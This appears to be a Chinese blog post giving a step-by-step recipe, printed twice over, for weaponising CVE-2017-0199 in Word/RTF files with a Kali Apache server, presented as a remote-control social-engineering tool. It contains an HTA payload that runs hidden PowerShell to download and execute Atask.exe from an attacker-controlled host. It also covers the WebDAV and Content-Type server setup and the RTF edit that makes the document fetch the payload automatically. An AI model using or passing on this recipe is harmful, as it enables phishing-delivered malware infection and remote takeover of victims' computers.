CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器

摘要

Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1:poc

POC的内容:

<script> poc=new ActiveXObject("WScript.Shell"); poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(/'http://ip_url/Atask.exe/', /'c:/windows/temp/Atask.exe/'); c:/windows/temp/Atask.exe', 0);window.close(); </script>

2:word 文档

随意 例如: a.docx

一:KaLi  开启DAV

a2enmod dav  a2enmod dav_fs  a2enmod dav_lock  a2enmod headers  service apache2 restart

二:Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件 保存成 rtf文件 (b.rtf)

四:Kali服务器上 删除 /var/www/html/a.rtf 文件,把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容:

<Directory />  Dav on  </Directory>  <Directory /var/www/html/ms/>  Header set Content-Type "application/hta"  </Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到: `/object/objautlink/rsltpict`  替换为 `/object/objautlink/objupdate/rsltpict`:

保存。。。制作完成

Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1:poc

POC的内容:

<script> poc=new ActiveXObject("WScript.Shell"); poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(/'http://ip_url/Atask.exe/', /'c:/windows/temp/Atask.exe/'); c:/windows/temp/Atask.exe', 0);window.close(); </script>

2:word 文档

随意 例如: a.docx

一:KaLi  开启DAV

a2enmod dav  a2enmod dav_fs  a2enmod dav_lock  a2enmod headers  service apache2 restart

二:Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件 保存成 rtf文件 (b.rtf)

四:Kali服务器上 删除 /var/www/html/a.rtf 文件,把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容:

<Directory />  Dav on  </Directory>  <Directory /var/www/html/ms/>  Header set Content-Type "application/hta"  </Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到: `/object/objautlink/rsltpict`  替换为 `/object/objautlink/objupdate/rsltpict`:

保存。。。制作完成

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: